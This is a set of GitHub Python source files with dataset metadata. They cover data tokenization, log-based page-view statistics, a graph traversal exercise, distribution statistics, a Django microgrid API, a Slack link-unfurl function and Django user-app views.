_tokenize(self, x: List[str]):\n return self.tokenizer(\n x, return_tensors=\"pt\", return_token_type_ids=False, padding=True, truncation=True\n )\n\n def _tokenize_df(self, df: pd.DataFrame) -> Dict[str, Any]:\n return {\n \"text\": self._tokenize(df['title'].values.tolist())\n }\n", "repo_name": "andreeaiana/manner", "sub_path": "manner/data/components/adressa_news_dataset.py", "file_name": "adressa_news_dataset.py", "file_ext": "py", "file_size_in_byte": 1801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "manner.data.components.adressa_dataframe.AdressaDataFrame", "line_number": 13, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 18, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 18, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 19, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 27, "usage_type": "name"}, {"api_name": 
"typing.Tuple", "line_number": 27, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "attribute"}, {"api_name": "transformers.PreTrainedTokenizer", "line_number": 41, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 49, "usage_type": "call"}, {"api_name": "manner.data.components.mind_batch.MINDNewsBatch", "line_number": 51, "usage_type": "call"}, {"api_name": "manner.data.components.mind_batch.MINDNewsBatch", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 53, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 58, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 58, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "16069439929", "text": "import os\nimport argparse\nimport sys\nimport dateutil\nimport pytz\nimport pandas as pd\nfrom tabulate import tabulate\nimport datetime\n\n\ndef open_log(path: str) -> pd.DataFrame:\n \"\"\" Receives a string indicating the file path and return a dataframe of file data \"\"\"\n if not os.path.isfile(path):\n raise argparse.ArgumentTypeError(f\"The file {path} does not exist.\")\n\n try:\n return pd.read_csv(path, sep=\";|,|\\|\", engine=\"python\")\n\n except:\n raise argparse.ArgumentTypeError(f\"The format of file {path} is not valid. Error: {sys.exc_info()[0]} - {sys.exc_info()[1]}\")\n\n\ndef convert_timezone(date_convert: datetime) -> datetime:\n \"\"\" Receives a datetime with timezone parameter and sets the timezone to UTC \"\"\"\n return date_convert.astimezone(pytz.utc)\n\n\ndef clean_data(df_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Remove NaN columns, white spaces from column names and cast timestamp column to datetime\n\n Args:\n df_data : pd.Dataframe\n DataFrame with raw data\n\n Return:\n A pd.Dataframe with cleaned data\n\n \"\"\"\n try:\n df_data.dropna(axis=1, how=\"all\", inplace=True)\n df_data.columns = df_data.columns.str.replace(' ', '')\n df_data.loc[:, 'timestamp'] = pd.to_datetime(df_data['timestamp'])\n df_data['timestamp'] = df_data['timestamp'].apply(convert_timezone)\n return df_data\n\n except dateutil.parser.ParserError:\n print('Ops! Invalid date/hour!')\n sys.exit(os.EX_DATAERR)\n\n except KeyError:\n print('Ops! 
', sys.exc_info()[1], 'column was not found.')\n sys.exit(os.EX_DATAERR)\n\n except Exception:\n print(\"Unexpected error:\", sys.exc_info()[0])\n sys.exit(os.EX_SOFTWARE)\n\n\ndef calc_statistics(df_logs: pd.DataFrame, date_from: datetime, date_to: datetime) -> pd.DataFrame:\n \"\"\" Calculate the page views and unique visitors.\n\n Args:\n df_logs: pd.DataFrame\n Filtered and Cleaned dataframe to generate output report\n date_from: datetime\n Date Range - Initial date\n date_to: datetime\n Date Range - Final date\n\n Returns:\n A dataframe with the number of page views and visitors for each url.\n Columns: url, pageviews, visitors\n \"\"\"\n try:\n df_logs = df_logs.loc[(df_logs['timestamp'] >= date_from) & (df_logs['timestamp'] <= date_to)]\n\n # unique visitors by url\n df = df_logs.groupby(\"url\").agg({\"userid\": pd.Series.nunique})\n df.rename(columns={'userid': 'visitors'}, inplace=True)\n\n # pageviews\n data = df_logs.groupby([\"url\"])\n data = data.size().reset_index(name=\"pageviews\")\n df_merge = pd.merge(data, df, how=\"inner\", on=[\"url\"])\n\n return df_merge\n\n except Exception:\n print(\"Unexpected error:\", sys.exc_info()[0])\n sys.exit(os.EX_SOFTWARE)\n\n\nif __name__ == '__main__':\n\n # Parse CLI Arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"date_from\",\n help=\"Start date for time range filter. Example: '2013-09-01 09:00:00'.\",\n type=lambda d: dateutil.parser.parse(d))\n parser.add_argument(\"date_to\",\n help=\"End date for time range filter. Example: '2013-09-01 10:59:59'.\",\n type=lambda d: dateutil.parser.parse(d))\n parser.add_argument(\"log\",\n help=\"Path to a log of website visitors.\",\n type=open_log)\n parser.add_argument(\"-o\", \"--output\",\n help=\"Path to save the output as a CSV file.\",\n required=False,\n type=str)\n args = parser.parse_args()\n\n\n # Standardize datetimes to UTC\n date_from = convert_timezone(args.date_from)\n date_to = convert_timezone(args.date_to)\n\n\n # Processing\n df_logs = clean_data(args.log)\n df_result = calc_statistics(df_logs, date_from, date_to)\n\n\n # Output\n print(tabulate(df_result, headers='keys', tablefmt='pretty', showindex=False))\n # If output parameter is set, save the file\n if args.output:\n df_result.to_csv(args.output, index=False)", "repo_name": "camylawojcik/tracking_report", "sub_path": "report/tracking_pixels.py", "file_name": "tracking_pixels.py", "file_ext": "py", "file_size_in_byte": 4169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pytz.utc", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 42, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "os.EX_DATAERR", "line_number": 48, 
"usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 51, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 52, "usage_type": "call"}, {"api_name": "os.EX_DATAERR", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "os.EX_SOFTWARE", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 90, "usage_type": "call"}, {"api_name": "os.EX_SOFTWARE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 96, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 99, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 99, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tabulate.tabulate", "line_number": 124, "usage_type": "call"}]} +{"seq_id": "24737028807", "text": "import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nn = int(input())\ngraph = [[] for _ in range(n+1)]\nfor i in range(n-1):\n v1, v2 = map(int, input().split())\n graph[v1].append(v2)\n graph[v2].append(v1)\n\nparent = [0] * (n+1)\nvisited = [False] * (n+1)\n\nqueue = deque([1])\nvisited[1] = True\nwhile queue:\n v = queue.popleft()\n for i in graph[v]:\n if not visited[i]:\n queue.append(i)\n parent[i] = v\n visited[i] = True\n\nfor i in parent[2:]:\n print(i)\n", "repo_name": "miseongk/Algorithm", "sub_path": "BAEKJOON/Classification/Graph_Traversal/11725.py", "file_name": "11725.py", "file_ext": "py", "file_size_in_byte": 521, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.stdin", "line_number": 3, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "71252770088", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\nfrom scipy import stats\n\n\n\n\ndef savitzky_golay(y, window_size=100, order=3, deriv=0, rate=1):\n import numpy as np\n from math import factorial\n\n order_range = range(order+1)\n half_window = (window_size -1) // 2\n b = np.mat([[k**i for i in order_range] for k in range(-half_window, half_window+1)])\n m = np.linalg.pinv(b).A[deriv] * rate**deriv * factorial(deriv)\n firstvals = y[0] - np.abs( y[1:half_window+1][::-1] - y[0] )\n lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve( m[::-1], y, mode='valid')\n\n\ndef smooth(x):\n smooth_x = np.round(savitzky_golay(x, window_size=100))\n return smooth_x\n\n\ndef get_center(x):\n mean = np.mean(x)\n media = np.median(x)\n mode = np.argmax(np.bincount(x.astype(int)))\n# from collections import Counter\n# c = Counter(x)\n# mode = sorted(c.keys(), key=lambda x:c[x])[-1]\n return mean, media, mode\n\n\ndef get_center2(x, n_bins=20):\n mean = np.mean(x)\n media = np.median(x)\n mode = np.argmax(savitzky_golay(np.bincount(x), window_size=(max(x) - min(x)) // n_bins))\n return mean, 
media, mode\n\n\ndef get_scatter(x):\n var = np.var(x)\n std = np.std(x)\n #std = var ** 0.5\n cv = 100. * std / np.mean(x)\n return var, std, cv\n\n\ndef quantile(x):\n return [np.percentile(x, i) for i in [0, 25, 50, 75, 100]]\n\ndef count_bitmap(x):\n c = np.bincount(x)\n return c[min(x):]\n\n\ndef pdf(x, norm_flag=False, zoom=1.):\n x = np.array(x)\n bias = x.min()\n x = (x - bias) * zoom \n x = x.astype(int)\n #c = np.bincount(x)\n c = count_bitmap(x)\n if norm_flag:\n# c = c * (x.max() - x.min()) * 1. / len(x) \n c = c * zoom * 1. / len(x) \n #return np.arange(x.min()+bias, x.max()+1+bias) * 1. / zoom, c \n return np.arange(x.min(), x.max()+1) * 1. / zoom + bias, c \n\ndef cdf(x, norm_flag=False):\n i, p = pdf(x, norm_flag=False)\n cp = np.add.accumulate(p)\n if norm_flag:\n cp = cp * 1. / len(x)\n return i, cp\n \n\ndef pdf2(x, norm_flag=False, n_bins=20, zoom=1):\n i, p = pdf(x, norm_flag, zoom=zoom)\n xp = savitzky_golay(p, window_size=len(p)//n_bins)\n xp[xp < 0] = 0\n return i, xp\n \ndef skewness(x):\n return stats.moment(x, moment=3) / (np.std(x) ** 3)\n \ndef kurtosis(x):\n return stats.moment(x, moment=4) / (np.var(x) ** 2) - 3", "repo_name": "KG-book/EntityMining", "sub_path": "chapter2/src/data_distribute_feature.py", "file_name": "data_distribute_feature.py", "file_ext": "py", "file_size_in_byte": 2424, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 43, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.mat", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 15, "usage_type": "attribute"}, {"api_name": "math.factorial", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.add.accumulate", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 75, "usage_type": "attribute"}, {"api_name": "scipy.stats.moment", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.std", "line_number": 88, "usage_type": "call"}, {"api_name": 
"scipy.stats.moment", "line_number": 91, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 91, "usage_type": "name"}, {"api_name": "numpy.var", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "4657340891", "text": "from rest_framework.views import APIView\nfrom core.serializer import MicrogridSerializer\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.generics import CreateAPIView\nfrom core.serializer import MicrogridSerializer, MicrogridParametersSerializer, ComponentSerializer, MicrogridSerializer, DataPointsSerializer\nimport json\nfrom core.models import Microgrid\nfrom itertools import chain, starmap\n\ndef flatten_parameters(microgrid_parameters):\n\n flattened_dict = {}\n flattened_dict['microgrid'] = microgrid_parameters['microgrid']\n flattened_dict['connection_type'] = microgrid_parameters['point_of_common_coupling']['connection_type']\n flattened_dict['connection_type'] = microgrid_parameters['point_of_common_coupling']['connection_type']\n flattened_dict['diesel_price'] = microgrid_parameters['point_of_common_coupling']['diesel_price']\n flattened_dict['natural_gas_price'] = microgrid_parameters['point_of_common_coupling']['natural_gas_price']\n flattened_dict['utility_name'] = microgrid_parameters['point_of_common_coupling']['utility']['utility_name']\n flattened_dict['group'] = microgrid_parameters['point_of_common_coupling']['utility']['consumer_type']['group']\n flattened_dict['subgroup'] = microgrid_parameters['point_of_common_coupling']['utility']['consumer_type']['subgroup']\n flattened_dict['tariff_type'] = microgrid_parameters['point_of_common_coupling']['utility']['consumer_type']['tariff_type']\n flattened_dict['pis_cofins'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['pis_cofins']\n flattened_dict['icms_1_limit'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_1']['limit']\n flattened_dict['icms_1_value'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_1']['value']\n flattened_dict['icms_2_limit'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_2']['limit']\n flattened_dict['icms_2_value'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_2']['value']\n flattened_dict['icms_3_limit'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_1']['limit']\n flattened_dict['icms_3_value'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_1']['value']\n flattened_dict['tusd_d_peak'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_d_peak']\n flattened_dict['tusd_d_base'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_d_base']\n flattened_dict['tusd_e_peak'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_e_peak']\n flattened_dict['tusd_e_intermediary'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_e_intermediary']\n flattened_dict['tusd_e_base'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_e_base']\n flattened_dict['energy_price_peak'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['energy']['energy_price_peak']\n flattened_dict['energy_price_intermediary'] = 
microgrid_parameters['point_of_common_coupling']['utility']['rates']['energy']['energy_price_intermediary']\n flattened_dict['energy_price_base'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['energy']['energy_price_base']\n flattened_dict['tariff_flag_signal'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['energy']['tariff_flag_signal']\n\n return flattened_dict\n\ndef flatten_component(lista):\n\n new_dict = {}\n new_dict['component_id'] = lista['component_id']\n new_dict['component_type'] = lista['component_type']\n new_dict['operation_status'] = lista['operation_status']\n new_dict['meters_id'] = lista['meters'][list(lista['meters'].keys())[0]]['meters_id']\n new_dict['data_points'] = lista['meters'][list(lista['meters'].keys())[0]]['data_points']\n\n return new_dict\n \ndef append_flattened_components(request, request_id):\n new_request_flattened = []\n for n in request:\n each_component_flattened = flatten_component(n)\n each_component_flattened['microgrid'] = request_id\n new_request_flattened.append(each_component_flattened)\n return new_request_flattened \n\n\n\nclass MrConfig(APIView):\n\n def post(self, request):\n \"\"\"Manipulate request data and validate with serializers\"\"\"\n \n \"\"\"Slice microgrid_info\"\"\" \n microgrid_info = request.data['microgrid_info']\n\n \"\"\"Validate microgrid_info and save in database\"\"\"\n serializer = MicrogridSerializer(data=microgrid_info)\n if serializer.is_valid():\n serializer.save()\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n \"\"\"Slice microgrid_paramters\"\"\"\n microgrid_parameters = request.data[\"microgrid_parameters\"]\n\n \"\"\"Assign microgrid_id to microgrid_parameters\"\"\"\n microgrid_parameters['microgrid'] = serializer.data.get('id')\n\n \"\"\"Slice microgrid_components\"\"\"\n microgrid_components = request.data['components']\n\n \"\"\"Assign microgrid_id to microgrid_components\"\"\"\n microgrid_components = append_flattened_components(request.data[\"components\"], serializer.data.get('id'))\n\n \"\"\"Flatten microgrid_parameters\"\"\"\n new_dict = flatten_parameters(microgrid_parameters)\n\n \"\"\"Validate microgrid_parameters and save in database\"\"\"\n serializer = MicrogridParametersSerializer(data=new_dict)\n if serializer.is_valid():\n serializer.save()\n \n \"\"\"Validate microgrid_parameters and save in database\"\"\"\n serializer = ComponentSerializer(data=microgrid_components, many=True)\n if serializer.is_valid():\n serializer.save()\n \n \"\"\"Assign component_id to each data_point\"\"\"\n microgrid_data_points = []\n for n in range(0, len(serializer.data)):\n data_point_per_component = microgrid_components[n]['data_points']\n for i in data_point_per_component:\n i['component'] = serializer.data[n]['id']\n microgrid_data_points.append(i)\n \n \"\"\"Validate microgrid_data_points and save in database\"\"\"\n serializer = DataPointsSerializer(data=microgrid_data_points, many=True)\n if serializer.is_valid():\n serializer.save()\n message = 'Microrrede Adicionada Com Sucesso'\n return Response({'message' : message})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n ", "repo_name": "jvrcerti/plataforma2", "sub_path": "core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6781, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 63, 
"usage_type": "name"}, {"api_name": "core.serializer.MicrogridSerializer", "line_number": 72, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 76, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 76, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 76, "usage_type": "name"}, {"api_name": "core.serializer.MicrogridParametersSerializer", "line_number": 94, "usage_type": "call"}, {"api_name": "core.serializer.ComponentSerializer", "line_number": 99, "usage_type": "call"}, {"api_name": "core.serializer.DataPointsSerializer", "line_number": 112, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 116, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 118, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 118, "usage_type": "name"}]} +{"seq_id": "23879220044", "text": "import matplotlib.pyplot as plt\ndef read_data(file_path):\n data = []\n with open(file_path, 'r') as file:\n lines = file.readlines()\n for line in lines:\n data.append(float(line.strip()))\n return data\n\ndef plot_data(data):\n x = list(range(1, len(data)+1))\n plt.plot(x, data)\n plt.xlabel('Rounds')\n plt.ylabel('Accuracy')\n plt.title('Accuracy Plot for Client1')\n plt.show()\n\nfile_path = 'C:\\\\Users\\\\intel\\\\Desktop\\\\Arjun Workspace\\\\B.Tech-Project---Federated-Learning\\\\Project_file\\\\models\\\\accuracy1.txt'\ndata = read_data(file_path)\nplot_data(data)", "repo_name": "Arjun-93/B.Tech-Project---Federated-Learning", "sub_path": "Project_file/models/plotting.py", "file_name": "plotting.py", "file_ext": "py", "file_size_in_byte": 597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "32555150620", "text": "import os\nimport json\nimport requests\n\nBOT_TOKEN = os.environ['SLACK_BOT_TOKEN']\n\ndef handle_event(request):\n request_json = request.get_json()\n if not request_json:\n return 'ok'\n elif 'challenge' in request_json:\n return {'challenge': request_json['challenge']}\n elif 'event' in request_json:\n print('5')\n if request_json['event']['source'] == 'conversations_history' and request_json['event']['links']:\n user = request_json['event']['user']\n links = [x['url'] for x in request_json['event']['links']]\n channel = request_json['event']['channel']\n ts = request_json['event']['message_ts']\n print('link:', links)\n print('channel:', channel)\n print('user:', user)\n unfurl_link(channel, ts, links)\n else:\n return 'ok'\n\ndef 
unfurl_link(channel, ts, links):\n blocks = {\n 'blocks': [\n {\n 'type': 'section',\n 'text': {\n 'type': 'mrkdwn',\n 'text': \"*It looks like you've got a document to sign!*\"\n },\n 'accessory': {\n 'type': 'button',\n 'action_id': 'orbit',\n 'text': {\n 'type': 'plain_text',\n 'text': 'Open document'\n },\n 'style': 'primary',\n 'url': 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'\n }\n }\n ]\n }\n unfurl_json = {\n 'channel': channel,\n 'ts': ts,\n 'unfurls': {link: blocks for link in links}\n }\n url = 'https://slack.com/api/chat.unfurl'\n payload = json.dumps(unfurl_json)\n headers = {\n 'Authorization': f'Bearer {BOT_TOKEN}',\n 'Content-Type': 'application/json'\n }\n requests.request('POST', url, headers=headers, data=payload)\n", "repo_name": "idandrd/slack-links-pe-demo", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1940, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 5, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "19689563878", "text": "from django.shortcuts import render, redirect\n\nfrom django.views.generic import FormView,TemplateView\nfrom django.urls import reverse_lazy\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.http import HttpResponseForbidden\nfrom django.contrib.auth.decorators import login_required\n#from django.http import HttpResponse\n#import json\nfrom .models import Userapps, Applications\nfrom django.db import connection\n\nfrom .forms import AppUserForm\n\n#class HomeView(TemplateView):\n# template_name = 'home/index.html'\n\n\nclass AjaxTemplateMixin(object): \n def dispatch(self, request, *args, **kwargs):\n if not hasattr(self, 'ajax_template_name'):\n split = self.template_name.split('.html')\n split[-1] = '_inner'\n split.append('.html')\n self.ajax_template_name = ''.join(split)\n if request.is_ajax():\n self.template_name = self.ajax_template_name\n return super(AjaxTemplateMixin, self).dispatch(request, *args, **kwargs)\n\n\nclass AppUserFormView(SuccessMessageMixin, AjaxTemplateMixin,FormView):\n template_name = 'home/add_app_form.html'\n form_class = AppUserForm\n success_url = reverse_lazy('home:index')\n #success_message = \"Way to go!\"\n\n # initialize the form choicefields \n def get_form_kwargs(self):\n kwargs = super(AppUserFormView, self).get_form_kwargs()\n kwargs['user'] = self.request.user.id\n return kwargs\n\n def form_valid(self, form):\n # This method is called when valid form data has been POSTed.\n # It should return an HttpResponse.\n #print(form.cleaned_data['app'])\n form.save(self.request.user.id)\n return super().form_valid(form)\n\n def get(self, request, *args, **kwargs):\n if not request.user.is_authenticated:\n return HttpResponseForbidden()\n #form_class = self.get_form_class()\n #form = self.get_form(form_class)\n #context = self.get_context_data(**kwargs)\n #context['form'] = form\n #print(\"GET: {}/{}\".format(request.user.id,request.user.username))\n return super().get(request, *args, **kwargs)\n\n '''\n def get_success_url(self):\n return reverse('home:index')\n\n def post(self, request, *args, **kwargs):\n print(\"POST: {}/{}\".format(request.user.id,request.user.username))\n form = self.get_form()\n return super().post(request, *args, **kwargs)\n \n '''\n\ndef get_userapps(userid):\n if userid 
is None:\n return None\n with connection.cursor() as cursor:\n rows = cursor.execute('''SELECT applications.id,\n name, description, color, defaultstatus, link, place_order FROM applications \n INNER JOIN userapps ON (userapps.app_id_id=applications.id \n and userapps.user_id_id = {})\n ORDER BY place_order\n '''.format(userid)).fetchall()\n if rows == []:\n data = cursor.execute(\"SELECT id FROM applications WHERE defaultstatus=1\").fetchall()\n data = [(i+1,)+d+(userid,) for i,d in enumerate(data)]\n #print(data)\n cursor.executemany('''INSERT INTO userapps(place_order,app_id_id,user_id_id) \n VALUES (?,?,?)''',data)\n rows = cursor.execute('''SELECT applications.id,\n name, description, color, defaultstatus, link, place_order FROM applications \n INNER JOIN userapps ON (userapps.app_id_id=applications.id \n and userapps.user_id_id = {})\n ORDER BY place_order\n '''.format(userid)).fetchall()\n\n\n return rows\n\n# Create your views here.\ndef index(request):\n userid = request.user.id\n userapps = get_userapps(userid)\n context = {\n 'title': 'Home Page',\n 'userapps_list': userapps,\n }\n return render(request, 'home/index.html', context=context)\n\nfrom django.views.decorators.csrf import csrf_exempt\n\n@login_required\n@csrf_exempt\ndef delete(request, app_id):\n userid = request.user.id\n Userapps.objects.filter(app_id=app_id,user_id=userid).delete()\n return redirect('home:index')\n\n@csrf_exempt\ndef sort(request):\n userid = request.user.id\n #print(\"INDEX userid: \",userid)\n orders = request.GET.get('order', None)\n orders = orders.split(',')\n orders.pop() # delete a empty str\n orders = [int(i) for i in orders]\n #print(\"INDEX order: \", orders)\n for i,order in enumerate(orders):\n #print(order, i+1)\n Userapps.objects.filter(user_id=userid,app_id=order).update(place_order=i+1)\n return redirect('home:index') \n\n\n", "repo_name": "mdalai/webapp-skeleton", "sub_path": "home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.messages.views.SuccessMessageMixin", "line_number": 31, "usage_type": "name"}, {"api_name": "django.views.generic.FormView", "line_number": 31, "usage_type": "name"}, {"api_name": "forms.AppUserForm", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.reverse_lazy", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.HttpResponseForbidden", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.connection.cursor", "line_number": 74, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 74, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 105, "usage_type": "call"}, {"api_name": "models.Userapps.objects.filter", "line_number": 113, "usage_type": "call"}, {"api_name": "models.Userapps.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "models.Userapps", "line_number": 113, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 114, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 109, "usage_type": "name"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 110, "usage_type": "name"}, {"api_name": "models.Userapps.objects.filter", "line_number": 127, "usage_type": "call"}, {"api_name": "models.Userapps.objects", "line_number": 127, "usage_type": "attribute"}, {"api_name": 
